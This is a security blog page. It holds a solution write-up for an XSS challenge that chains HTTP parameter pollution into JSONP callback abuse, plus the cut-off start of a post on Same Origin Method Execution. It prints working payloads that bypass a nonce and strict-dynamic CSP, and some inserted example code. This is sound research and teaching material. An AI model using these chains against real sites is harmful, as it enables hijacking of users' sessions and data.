Ben Hayak - Security Blog (Web Security, Network Security, Reverse Engineering - Exposed)
Post: Leveraging JSONP to SOME via HTTP Parameter Pollution (published 2020-08-14, updated 2020-08-17)
<br />
<h1>Introduction</h1>
<br />
<div>
<p>
When you see callback control in a JSONP endpoint, doesn't that make you
want to execute XSS? But there's always this "text/javascript" (or similar)
content-type standing in the way.
</p>
<p>
During BlackHat 2014 I presented the
<a href="https://www.someattack.com/Playground/About" rel="nofollow" target="_blank">Same Origin Method Execution</a>
(SOME) attack. The talk explains how to abuse callback endpoints to execute javascript methods in a vulnerable domain.
</p>
<p>
Nowadays, finding vulnerable callback endpoints has become harder, as passive content-types dominate the web while the vulnerable, active content-types like "text/html", "Adobe Flash" or "ActiveX plugins" are less common.
In the second
<a href="https://conference.hitb.org/hitbsecconf2017ams/materials/D2T1%20-%20Ben%20Hayak%20-%20Advanced%20Same%20Origin%20Method%20Execution.pdf" rel="nofollow" target="_blank">SOME talk</a>
during HackInTheBox 2017, I shared a hint about my ongoing research:
</p>
<br />
<br />
<blockquote style="text-align: center;">
<span style="font-size: x-large;">"JSONP is NOT vulnerable without a chain"</span>
<br />
(<a href="https://conference.hitb.org/hitbsecconf2017ams/materials/D2T1%20-%20Ben%20Hayak%20-%20Advanced%20Same%20Origin%20Method%20Execution.pdf#page=16" rel="nofollow" target="_blank">slide 16</a>, under "What are the vulnerable endpoints?")
</blockquote>
<br /><br />
As I was always "too busy" to publish it, on Jun 7, 2020, @kinugawamasato posted the following tweet:
<blockquote class="twitter-tweet">
<p dir="ltr" lang="en">
I created a new XSS challenge! Can you solve it?
<a href="https://t.co/reTuO3oxjE">https://t.co/reTuO3oxjE</a>
</p>
— Masato Kinugawa (@kinugawamasato)
<a href="https://twitter.com/kinugawamasato/status/1269679108499189760?ref_src=twsrc%5Etfw">June 7, 2020</a>
</blockquote>
<br />
His callback challenge was similar and inspired me to share my research in the form of my own XSS challenge.
<br />
</div>
<br /><br />
<h1>The Challenge</h1>
<div>
<div>
<br />
<p>
The challenge goal was to chain HPP to SOME, then bypass a strict CSP policy and get arbitrary cross-site scripting.
</p>
<p>
Over almost 2 months (Jun 18, 2020 - Aug 14, 2020) only 4 players solved it, even though Masato released the solution to his challenge on July 1st.
</p>
<p>
The following is the original tweet:
</p>
<blockquote class="twitter-tweet">
<p dir="ltr" lang="en">XSS Challenge is out! Try to trigger alert(𝒏𝒐𝒏𝒄𝒆) in
<a href="https://t.co/R2ntR1YVHV">https://t.co/R2ntR1YVHV</a>
<br />
<br />Good luck!
<a href="https://t.co/5CKzARqkZj">https://t.co/5CKzARqkZj</a>
<br />
<br />Please DM me if you find any real bugs. Enjoy!
</p>
— Ben Hayak (@BenHayak)
<a href="https://twitter.com/BenHayak/status/1273599777679249410?ref_src=twsrc%5Etfw">June 18, 2020</a>
</blockquote>
<br />
</div>
<br />
<h2 class="post-body-h2">Challenge Structure</h2>
<br />
<div>
The challenge consisted of 3 pages:
<ol>
<li>index.html - Static Page</li>
<li>connect.php - JSONP endpoint</li>
<li>purify.js - Cure53's DOMPurify</li>
</ol>
</div>
<h2 class="post-body-h2">Entry points</h2>
<div>
index.html:
<ul>
<li><strong>"client_id"</strong> - URL parameter</li>
</ul>
connect.php:
<ul>
<li>
<strong>client_id</strong> - URL parameter - Limited control of
<strong>up to 38 characters</strong> (<= 38)
</li>
<li>
<strong>callback</strong> - URL parameter:
<ul>
<li>Limited to classic callback characters (filtered with <code>[^a-z0-9.]+/i</code>)</li>
<li>Blocked the string "write" to avoid using "document.write"</li>
</ul>
</li>
</ul>
</div>
<h2 class="post-body-h2">CSP Policy</h2>
<div>
<img data-original-height="113" data-original-width="569" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVlbpGBrV1MdG-GG9D7LzmQDFOC2jYVDMmJ4HsQLRQMWgfjeTcor321gjizqVCX9Ds0My7TYZFHYRVbtSzQjPa84-lFy9efo0vKMtATsiIpo0MV-uX5ixIHXzQ6AGRsOyfMdEJ-iFTiQA/s0/policy.png" />
<br />
The script-src directive only allows scripts with a valid nonce (I did not use a random nonce, but players were instructed to assume it is dynamic for every page load).
</div>
<br />
<h2 class="post-body-h2">The Challenge Workflow</h2>
<br />
<div>
On page load the index.html page:
<ol>
<li>Calls "init();" to insert items from the <strong>rules</strong> array, which is defined on the <strong>global scope</strong>.</li>
<li>Calls "connect(client_id)" to trigger the JSONP endpoint at "connect.php", appending <strong>client_id</strong> as a parameter.</li>
<li>Listens for the JSONP response, which calls back with "<strong>callback</strong>(<strong>response</strong>, status)".</li>
<li>Renders the response as HTML safely using Purify's sanitize function.</li>
</ol>
</div>
<h2 class="post-body-h2">Unintended Solution</h2>
<p>Shortly after I uploaded the challenge it was possible to skip its harder steps, as I forgot to include "base-uri 'none'"; that was quickly fixed.
</p>
</div>
<br /><br />
<br /><br />
<!--Solution-->
<h1>The Solution</h1>
<br />
<div>
<br />
<p>
To solve the challenge one had to complete several steps:
</p>
<ol>
<li>Control the method execution using a callback (SOME attack).</li>
<li>Abuse the lack of X-Frame-Options to obtain multiple method execution. </li>
<li>Inject arbitrary HTML limited to <strong>38 characters.</strong></li>
<li>Bypass CSP to execute XSS while abusing <strong>"strict-dynamic"</strong>.</li>
<li>Navigate the DOM tree to overcome character limits.</li>
</ol>
<br />
<p>
During my talk in 2017, I had already published the instructions for solving steps 1-2 and
<a href="https://conference.hitb.org/hitbsecconf2017ams/materials/D2T1%20-%20Ben%20Hayak%20-%20Advanced%20Same%20Origin%20Method%20Execution.pdf#page=35" rel="nofollow" target="_blank">step 5</a> (slide 35)
as part of the SOME white paper and slides.
</p>
<p>Before we dig into the details the following is the challenge solution:</p>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRVsOJZnFlcgDLzdj3htHjzXNwLq4JxPezV0PHDazdWCATePEW5obkf6Q8FgXTIO8jSu-38c-FyBXue9CjpUpRJE_TxGdZVppGxWEFP7HLR6jSbX9ZMj04CS23Asf7AkjOSsd2wEcWGyM/s1123/solution_mini_2020.png">
<img alt="" border="0" data-original-height="856" data-original-width="1123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRVsOJZnFlcgDLzdj3htHjzXNwLq4JxPezV0PHDazdWCATePEW5obkf6Q8FgXTIO8jSu-38c-FyBXue9CjpUpRJE_TxGdZVppGxWEFP7HLR6jSbX9ZMj04CS23Asf7AkjOSsd2wEcWGyM/s640/solution_mini_2020.png" width="100%" />
</a>
<br />
<p>
<a href="http://poc.benhayak.com/p/solutions/qr6bK579X7QYu7YfDcjLe92q/mini_2020-BenHayak.html" style="font-size: x-large;" rel="nofollow" target="_blank">Run the Solution</a>
</p>
<p>Here is a simplified version of the solution:</p>
<pre><code>// 1. Plant the HTML payload (an iframe whose srcdoc holds an empty script) into the global "rules" array
top.frame.rules.push("Error: '<iframe srcdoc='<script></script>'>'","406: Not Acceptable")
// 2. Re-run init() so the rules items, payload included, are rendered via innerHTML
top.frame.init("Error: 'x'","406: Not Acceptable")
// 3. Reach an injected empty (non-parser-inserted) script and append code that stores a reference to the parent's scripts;
//    the appended string is valid JavaScript: "Error:" parses as a label and the trailing quote is commented out
top.frame.itemsList.lastElementChild.previousSibling.previousSibling.previousSibling.firstElementChild.contentWindow.document.head.firstElementChild.append("Error: '';parent.x=parent.document.scripts//'","406: Not Acceptable")
// 4. Append the final payload to an injected empty script: alert the nonce of the first script
top.frame.itemsList.lastElementChild.previousSibling.lastElementChild.contentWindow.document.head.firstElementChild.append("Error: '';alert(parent.x[0].nonce)//'","406: Not Acceptable")
</code></pre>
<div><br /></div><br />
<h2 class="post-body-h2">Solvers 🎉</h2>
<br /><br />
<p>
Thankfully 4 of the players were above all others and solved this challenge relatively fast! All with the intended solution, though some used shorter and cleaner code to solve.
<br />
The first to solve was <a href="https://twitter.com/kinugawamasato" name="https://twitter.com/kinugawamasato" rel="nofollow" target="_blank">@kinugawamasato</a> the great, followed by 3 other fantastic players: Roman
Shafigullin (<a href="https://twitter.com/shafigullin" rel="nofollow" target="_blank">@shafigullin</a>), terjanq (<a href="https://twitter.com/terjanq" rel="nofollow" target="_blank">@terjanq</a>) and Luan Herrera (<a href="https://twitter.com/lbherrera_" rel="nofollow" target="_blank">@lbherrera_</a>)
</p>
<br />
<h1>Deep Dive</h1>
<br>
<h2 class="post-body-h2">Method Execution via HTTP Parameter Pollution</h2>
<p>☑️ Method execution can quite simply be controlled by abusing HPP.</p>
<p>
Injecting "%26callback=alert" into the client_id parameter allows us to overwrite the "connect.php" endpoint's callback parameter and therefore get control over the method to execute: %26 is the URL-encoded "&amp;", so once index.html decodes its own client_id and appends it to the connect.php request, the value carries a second callback parameter that takes precedence over the original one.
</p>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3r_vUiHqg9kA9T4OqPMDCsNy4P-lb2PyF0TsW-LqTWB_vivzYY11O2G634CJfAeEo-aCydnPnwgUZzmvOmYWaBE9pvA0nB51pQFBlyeJUPedEu5mj9GBxW43QSvrMEg5Fc-hxwnaeJd8/s525/method_execution.png">
<img alt="" border="0" data-original-height="157" data-original-width="525" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3r_vUiHqg9kA9T4OqPMDCsNy4P-lb2PyF0TsW-LqTWB_vivzYY11O2G634CJfAeEo-aCydnPnwgUZzmvOmYWaBE9pvA0nB51pQFBlyeJUPedEu5mj9GBxW43QSvrMEg5Fc-hxwnaeJd8/s0/method_execution.png" />
</a>
<br /> <br />
<p>This however will only execute an alert, which will not allow stealing the CSP nonce or executing arbitrary XSS.</p>
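To make the HPP step concrete, here is an added example (not the challenge's own index.html or connect.php) that models how a client helper which concatenates the decoded client_id turns "%26callback=alert" into a second callback parameter, and how building the URL with URLSearchParams keeps it a single value. The "render" callback name, the function names and the last-occurrence-wins server model (PHP's $_GET behaviour) are assumptions.

```javascript
// Added example: HPP through the client_id parameter, vulnerable and hardened.

// The page's index.html reads client_id from its own URL; the browser decodes
// "%26" to "&" at this point, so the value already contains a raw ampersand.
function readClientId(pageQuery) {
  return new URLSearchParams(pageQuery).get("client_id");
}

// Vulnerable: the decoded value is glued into the connect.php URL unencoded,
// so the embedded "&callback=alert" becomes a parameter of its own.
function buildConnectUrlVulnerable(clientId) {
  return "connect.php?callback=render&client_id=" + clientId;
}

// Hardened: URLSearchParams percent-encodes "&" and "=" inside the value,
// so client_id stays one parameter whatever it contains.
function buildConnectUrlHardened(clientId) {
  const params = new URLSearchParams({ callback: "render", client_id: clientId });
  return "connect.php?" + params.toString();
}

// Model of connect.php's view of the request. Assumption: like PHP's $_GET,
// the last occurrence of a repeated key wins.
function serverCallback(url) {
  const params = new URLSearchParams(url.slice(url.indexOf("?") + 1));
  const all = params.getAll("callback");
  return all.length ? all[all.length - 1] : null;
}

// Server-side HPP check: a repeated query key means the request was polluted
// and should be rejected (or at least logged) rather than parsed last-wins.
function hasRepeatedParameter(url) {
  const seen = new Set();
  for (const key of new URLSearchParams(url.slice(url.indexOf("?") + 1)).keys()) {
    if (seen.has(key)) return true;
    seen.add(key);
  }
  return false;
}

// Constructed page URL carrying the "%26callback=alert" payload from the text.
const pageQuery = "?client_id=abc%26callback=alert";
const clientId = readClientId(pageQuery);                          // "abc&callback=alert"
console.log(serverCallback(buildConnectUrlVulnerable(clientId)));  // alert
console.log(serverCallback(buildConnectUrlHardened(clientId)));    // render
```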
<h2 class="post-body-h2">Multiple Method Execution</h2>
<p>
Multiple Method Execution is all about constructing a gadget and reusing existing code:
</p>
<ol>
<li>Set up 5-6 windows (iframes), depending on the number of methods we want to execute on the challenge page.</li>
<li>Abuse the JSONP endpoint with the designated <strong>callback</strong> parameter by navigating each window context to it.</li>
<li>Control the execution order.</li>
</ol>
<p>I've described the impact of executing multiple methods using SOME and how it can be as bad or nearly as bad as XSS throughout the SOME white-paper.</p>
<h2 class="post-body-h2">Pushing 38 Bytes of Arbitrary HTML </h2>
<p>
The first real step of the challenge was to "plant" HTML code into a globally defined array named "<strong>rules</strong>". This could be achieved using the native <strong>Array.push</strong> function:
</p>
<pre><code>top.frame.rules.push("Error: '<iframe srcdoc='<script></script>'>'","406: Not Acceptable")</code></pre>
<p>
Once we have arbitrary HTML in <strong>"rules"</strong>,
it is possible to use the JSONP endpoint again, this time to execute the <strong>"init()"</strong>
method defined in a whitelisted script. The code at "init" uses innerHTML to inject the
<strong>rules</strong> array items along with the smuggled 38 bytes of HTML payload!
</p>
Injecting the HTML:
<br />
<pre><code>top.frame.init("Error: 'x'","406: Not Acceptable")</code></pre>
We now finally have arbitrary HTML injection!
<br /><br />
<p>☑️ HTML injection (of 38 bytes)</p>
<h2 class="post-body-h2">Bypassing Content Security Policy</h2>
<p>
The server was set up to block anything but allowed scripts using the following CSP directives:
</p>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOSHF1VJi2Ukn2gH0x89dxilo1KS4qzXPQw-A-ieVm4iCLsJVkYq1WsRSqSyMCayqYWN-voBzn8DkHX8A692NOBieYX6Oj3ZxGWODjcEQRn_oVcdGfTg38lOrocoCI11GF2a_Ic3NeDqo/s569/policy.png">
<img alt="" border="0" data-original-height="113" data-original-width="569" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOSHF1VJi2Ukn2gH0x89dxilo1KS4qzXPQw-A-ieVm4iCLsJVkYq1WsRSqSyMCayqYWN-voBzn8DkHX8A692NOBieYX6Oj3ZxGWODjcEQRn_oVcdGfTg38lOrocoCI11GF2a_Ic3NeDqo/s0/policy.png" />
</a>
<p>
Reading the policy, one can spot a bold hint I left there: the strict-dynamic directive.
</p>
<p>
This step made quite a few players struggle, as it was about abusing strict-dynamic
to make a non-"parser-inserted" script element execute javascript code.
</p>
<br />
<h3>What is strict-dynamic?</h3>
<p>
A simple explanation can be found in <a href="https://content-security-policy.com/strict-dynamic/">content-security-policy.com</a>:
</p>
<blockquote>
The key super power of strict-dynamic is that it will allow whitelisted scripts to load additional scripts via non-"parser-inserted" script elements.
<br /><br />
So how do you create a non-"parser-inserted" script element? Here's an example: <br />
<pre><code>var s = document.createElement('script');
s.src = "https://cdn.example.com/some-script-you-need.min.js";
document.body.appendChild(s);</code></pre>
</blockquote>
<p>
That is great, but at this point in the challenge executing such code is impossible.
</p>
Yet, is that the <strong>only</strong> way we can create non-parser inserted scripts?
<br /><br />
<h3>Empty Script Nodes</h3>
<p>
If we carefully read the HTML5 spec we can notice the following:
</p>
<p>
"A <a href="#">script</a> element has a <strong>parser document</strong>, which is either null or a <a href="#">Document</a>. Initially, its value must be null. It is set by the <a href="#">HTML parser</a> and the <a href="#">XML parser</a> on <a href="#">script</a> elements they insert, and affects the processing of those elements.
<a href="#">script</a> elements with non-null <a href="#">parser documents</a> are known as <strong>"parser-inserted"</strong>."
</p>
<p>
So if a parser-inserted script tag has content, it is prepared and executed (or blocked by CSP) as a “parser-inserted” script.
</p>
<br />
<h3>Creating Scripts with null parser documents</h3>
<br />
<p>
The key point players had to figure out is that a script element's parser document is initially null (<em>"Initially, its value must be null"</em>) and, more importantly, that the spec's "prepare the script element" steps set the parser document back to null before bailing out on a script that has neither a src attribute nor source text. Therefore, <strong>an empty script ends up with a null parser document</strong>,
is not executed by the html parser, and no longer counts as "parser-inserted" when it later gains content.
</p>
<p>Here is how this was abused to solve the challenge:</p>
<pre><code><iframe srcdoc='<script></script>'></iframe></code></pre>
<p>
Notice this payload is 44 bytes (>38) and is blocked by the "connect.php" length limit. Luckily, we can drop the "</iframe>" and the browser will close the tag for us.
Once we have a non-parser-inserted script it is finally possible to abuse strict-dynamic.
</p>
<br />
☑️ non-parser inserted scripts
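The argument of the last two sections, as an added example that is not code from the post: a small model of the ordering inside the spec's "prepare the script element" steps, run on the cases the challenge hinges on (a nonced inline script, an un-nonced one, an innerHTML-created one, a createElement one, and the empty srcdoc script that later gets text appended). The element shape, the policy object and the result strings are assumptions; it simulates the spec's order, it is not browser code.

```javascript
// Added example: why an empty parser-inserted <script> ends with a null parser
// document, and why CSP 'strict-dynamic' then allows text appended to it.

function createScript({ text = "", parserDocument = null, fragment = false, nonce = null } = {}) {
  const el = { text, parserDocument, nonce, alreadyStarted: false, connected: true, executed: false };
  // Scripts created by the fragment parser (innerHTML) are marked "already
  // started" at creation, so they never run at all.
  if (fragment && parserDocument !== null) el.alreadyStarted = true;
  return el;
}

// CSP 'script-src' decision: a matching nonce always passes; with
// 'strict-dynamic' a script that was not parser-inserted passes too.
function cspAllows(el, parserInserted, policy) {
  if (el.nonce !== null && policy.nonces.includes(el.nonce)) return true;
  return policy.strictDynamic && !parserInserted;
}

function prepareScript(el, policy) {
  if (el.alreadyStarted) return "already-started";
  const parserDocument = el.parserDocument;   // "Let parser document be el's parser document"
  el.parserDocument = null;                   // "Set el's parser document to null"
  if (el.text === "") return "empty";         // no src and empty source text: bail out here
  if (!el.connected) return "not-connected";
  el.alreadyStarted = true;
  // The inline-behaviour CSP check uses the parser-inserted status captured at
  // the start of this run, which is null for a script whose earlier, empty run
  // already cleared it.
  if (!cspAllows(el, parserDocument !== null, policy)) return "blocked-by-csp";
  el.executed = true;
  return "executed";
}

// Node.append() on a script adds a text child; the "children changed" steps
// run "prepare the script element" again.
function appendText(el, text, policy) {
  el.text += text;
  return prepareScript(el, policy);
}

// Walk-through with the challenge's policy shape: one nonce plus strict-dynamic.
function walkthrough() {
  const policy = { nonces: ["n0nce"], strictDynamic: true };
  const doc = { name: "srcdoc-document" };   // stand-in for the iframe's Document
  const out = {};
  out.inlineNoNonce = prepareScript(createScript({ text: "alert(1)", parserDocument: doc }), policy);
  out.inlineWithNonce = prepareScript(createScript({ text: "alert(1)", parserDocument: doc, nonce: "n0nce" }), policy);
  out.innerHtml = prepareScript(createScript({ text: "alert(1)", parserDocument: doc, fragment: true }), policy);
  out.createdByScript = prepareScript(createScript({ text: "alert(1)" }), policy);
  const empty = createScript({ parserDocument: doc });   // <script></script> from the srcdoc
  out.emptyFirstRun = prepareScript(empty, policy);
  out.emptyParserDocumentAfter = empty.parserDocument;
  out.emptyAfterAppend = appendText(empty, "alert(1337)", policy);
  return out;
}

console.log(walkthrough());
```

The model only reproduces the ordering the spec prescribes; whether a given browser follows it for a given element is something to confirm in that browser, as the challenge did.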
<br /><br/>
<h2 class="post-body-h2">XSS via Node.append</h2>
<p>
The final part of the challenge can be broken down into 2 main steps:
</p>
<ul>
<li><a href="https://conference.hitb.org/hitbsecconf2017ams/materials/D2T1%20-%20Ben%20Hayak%20-%20Advanced%20Same%20Origin%20Method%20Execution.pdf#page=35" rel="nofollow" target="_blank">Navigate the DOM</a> to obtain a reference to the empty script, and</li>
<li>Find a method that allows adding content into the empty non-"parser inserted" script tag.</li>
</ul>
<p>
All that's left to do is construct valid javascript code and append it to the script node:
</p>
<pre><code>// Navigate the DOM to obtain a reference to the injected (non-parser-inserted) <script> node
var scriptNode = top.frame.itemsList.lastElementChild.previousSibling.previousSibling.previousSibling.firstElementChild.contentWindow.document.head.firstElementChild
// Adds content to the script tag and executes it: "Error:" parses as a label and the trailing quote is commented out
scriptNode.append("Error: '';alert(1337)//'","...")</code></pre>
<br />
<p>
☑️ Bypassing CSP for arbitrary XSS
</p>
<a href="http://poc.benhayak.com/p/solutions/qr6bK579X7QYu7YfDcjLe92q/mini_2020-BenHayak.html" style="font-size: x-large;" rel="nofollow" target="_blank">Run the Solution</a>
<p>
This writeup took longer than expected but I hope you enjoy it as much as I enjoyed writing it.
</p>
<p>Thanks to all who played!</p>
</div>
Post: Same Origin Method Execution (SOME) (published 2015-06-18, updated 2015-07-16)
<div align="center" class="MsoNormal" style="text-align: center;">
</div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGWOQCOMEMXLDM7PiiOZtoJfpVg9Ga73RuSoAfV27DHOGidJY1GSxg3Lc0lYORwFJh_EJHQt9yHtYq9PN1YhkzM6PyGCHkIzdrsX2mx4jmkYXDp6mlkUCVQugcM288RxvHw223PKaf2EY/s1600/logowhite.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" target="_blank"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGWOQCOMEMXLDM7PiiOZtoJfpVg9Ga73RuSoAfV27DHOGidJY1GSxg3Lc0lYORwFJh_EJHQt9yHtYq9PN1YhkzM6PyGCHkIzdrsX2mx4jmkYXDp6mlkUCVQugcM288RxvHw223PKaf2EY/s320/logowhite.png" width="182" /></a></div>
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">This blog post is a brief presentation of <span style="color: #e69138;"><b>"Same Origin Method Execution" (SOME)</b></span>. SOME is a web application attack which abuses callback endpoints (mainly <b>Flash </b>applets and <b>JSONP </b>endpoints, to which OAuth dialogs often redirect via redirect_uri) by forcing a victim into executing arbitrary scripting methods of any page on the endpoint’s domain. The impact of a SOME attack is similar to the impact of Cross-Site Scripting, though there are some important and distinguishing exploitation restrictions. Despite these limitations, it is important to note that the attack is not limited to a specific web functionality/page, nor confined in terms of UI or HTTP response headers. In fact, a payload of <b>only alphanumeric characters and a dot</b> will allow attackers to hijack dangerous web functionality and even exfiltrate sensitive user data such as private photos and/or videos. </span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Popular domains like <span style="color: #e69138;">Google, Yahoo, Microsoft</span> (plus.google.com, maps.yahoo.com, yammer.com and so on), along with the very popular platforms <span style="color: #e69138;">Wordpress</span> and <span style="color: #e69138;">VideoJS</span> (which turned <b>numerous domains vulnerable</b> to SOME), were affected by SOME. Many were recently fixed (responsible disclosure details are mentioned below).</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: x-large; line-height: 25.6800003051758px;"><b>Paper, Demo and Slides from BlackHat</b></span></span><br />
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: large; line-height: 107%;"><br /></span></b></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">If you wish to invest your time in exploring the fascinating technical details in depth, you are encouraged to read my <b><a href="http://files.benhayak.com/Same_Origin_Method_Execution__paper.pdf" target="_blank"><span style="color: #ffd966; font-family: Arial, Helvetica, sans-serif;">white-paper</span></a> </b><a href="https://www.blackhat.com/docs/eu-14/materials/eu-14-Hayak-Same-Origin-Method-Execution-Exploiting-A-Callback-For-Same-Origin-Policy-Bypass-wp.pdf" target="_blank"><span style="color: #fff2cc; font-family: Arial, Helvetica, sans-serif; font-size: x-small;">(mirror)</span></a>, or look at the updated Black-Hat <a href="https://www.slideshare.net/BenHayak/blackhat-eu-same-origin-method-execution" target="_blank">presentation</a>. The slides include a demonstration video of a SOME exploit: you can see how I used SOME to hijack Google cloud’s private photo and video albums. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">By the way, you can also find more details about the breach I am talking about in my previous blog post: <a href="http://www.benhayak.com/2015/05/stealing-private-photo-albums-from-Google.html" target="_blank">Stealing private photo albums from Google</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 17.1200008392334px;"><b>Attack Scenario:</b></span></span><br />
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: 12.0pt; line-height: 107%;"><br /></span></b></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">To understand the SOME attack we first need to cover some general aspects, so bear with me:</span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Web browsers allow execution of a variety of methods without considering the given arguments; for example, <i>form1.submit(“ignored”,”ignored”);</i> will evaluate exactly as the natural version <i>form1.submit();</i> will. Therefore, external control over the prefix/padding before the parentheses (as often given by many callback implementations) is enough for <b>hijacking dangerous web functionality</b> regardless of the arguments.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">In an environment with multiple windows and their respective documents, redirecting any of the documents will re-enforce Same Origin Policy to restrict cross-site window documents’ DOM access. However, <b>web browsers would not delete memory references to other window objects post-redirection</b>. For instance, whenever a document opens a popup window, the browser will add a memory reference pointing to this document and save it as the <b>window.opener</b> property of the new window. Regardless of any redirections this reference would continue to work unless it is explicitly deleted or destroyed.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Most callback endpoints are designed to only allow a limited set of characters as a callback parameter value. This is commonly done with the regex [a-zA-Z0-9_\.], or in other words, a charset consisting of alphanumerics, a dot and an underscore. Let me add that crafting a SOME exploit requires only an alphanumeric-and-dot charset. </span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Interaction between different browsing contexts is often implemented via callback execution. For instance, <b>Flash applets</b> and/or other callback endpoints (e.g. <b>OAuth dialogs</b>) commonly execute a callback function to <b>notify events</b> to a different browsing context. As a result, in cases where this callback can be controlled via an HTTP parameter, an attacker would be able to control and replace the <b>execution browsing context</b> (e.g. by redirecting the opener window document). Analogously, the <b>function/method</b> that the interpreter executes could also be controlled by the attacker.</span></li>
</ul>
</div>
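The third bullet above is the defender's lever, so here is an added example (not code from the SOME paper or from any affected site): a JSONP responder implemented first with the common charset check and then with an allowlist of the function names the endpoint actually serves. The function names, the allowlist entries and the callback value are assumptions; the callback value only copies the shape the post describes.

```javascript
// Added example: the charset check lets a dotted DOM path through; an allowlist does not.

const CALLBACK_CHARSET = /^[a-zA-Z0-9_.]+$/;   // the common check from the text
const KNOWN_CALLBACKS = new Set(["renderAlbum", "handleOAuthResult"]);

function wrap(callback, data) {
  return callback + "(" + JSON.stringify(data) + ");";
}

// Vulnerable: any string made of alphanumerics, underscores and dots becomes
// the method the response executes. A navigation path such as
// opener.document.body....submit fits the charset, so it passes.
function jsonpCharsetOnly(callback, data) {
  if (!CALLBACK_CHARSET.test(callback)) return null;
  return wrap(callback, data);
}

// Hardened: only the function names this endpoint was written for are
// accepted. A navigation path never matches, so the callback cannot be
// pointed at another window's methods.
function jsonpAllowlisted(callback, data) {
  if (!KNOWN_CALLBACKS.has(callback)) return null;
  return wrap(callback, data);
}

// Endpoint entry point: read the callback from the query string and refuse
// to build a response unless it is allowlisted.
function respondToQuery(query, data) {
  const callback = new URLSearchParams(query).get("callback");
  return callback === null ? null : jsonpAllowlisted(callback, data);
}

// Constructed callback value in the shape the post describes.
const SOME_STYLE_CALLBACK =
  "opener.document.body.privateAlbum.firstChild.nextElementSibling.submit";

console.log(jsonpCharsetOnly(SOME_STYLE_CALLBACK, { ok: true }));   // response is built
console.log(jsonpAllowlisted(SOME_STYLE_CALLBACK, { ok: true }));   // null
```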
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;">Same Origin Method Execution abuses the nature of user agents by forging a setup of windows/frames, in turn redirecting their documents. Using references created by this setup within a callback parameter will allow replacing the execution context with a targeted document and hijacking an existing web functionality within it.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"><span style="line-height: 25.6800003051758px;"><b>Manipulating a Surface for Method Execution</b></span></span></div>
<div class="MsoNormal">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><span style="font-family: Arial, Helvetica, sans-serif;"><b>Initial steps:</b></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l2 level1 lfo1; text-indent: -18.0pt;">
<ol>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Firstly, the attacker has to detect a vulnerable instance - either a plugin or a vulnerable callback endpoint document. A vulnerable instance is the one that leads the browser’s interpreter towards active execution of a function name supplied by a (callback) parameter value.<br /><i>Note: Instances that respond with passive mime types like application/json are not vulnerable when accessed directly.</i> </span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">In the second preparatory step the attacker has to choose a target webpage hosted on the same domain (http://www.vulnerable-domain.com/photoAlbums). Aiming at hijacking a web functionality (e.g. object method, javascript function) of this target webpage, the attacker shall assemble a reference using DOM navigation or a direct reference pointing to it, for example: </span><span style="font-family: Arial, Helvetica, sans-serif;"><i>document.body.privateAlbum.firstChild.nextElementSibling.submit</i></span></li>
</ol>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Setting up the Exploit:</b></span><br />
<ol>
<li><span style="font-family: Arial, Helvetica, sans-serif;">For setting up SOME and creating the appropriate window references, one has to create an exploitation surface/environment by opening a new browsing context (WIN1).</span></li>
<div class="separator" style="clear: both; text-align: center;">
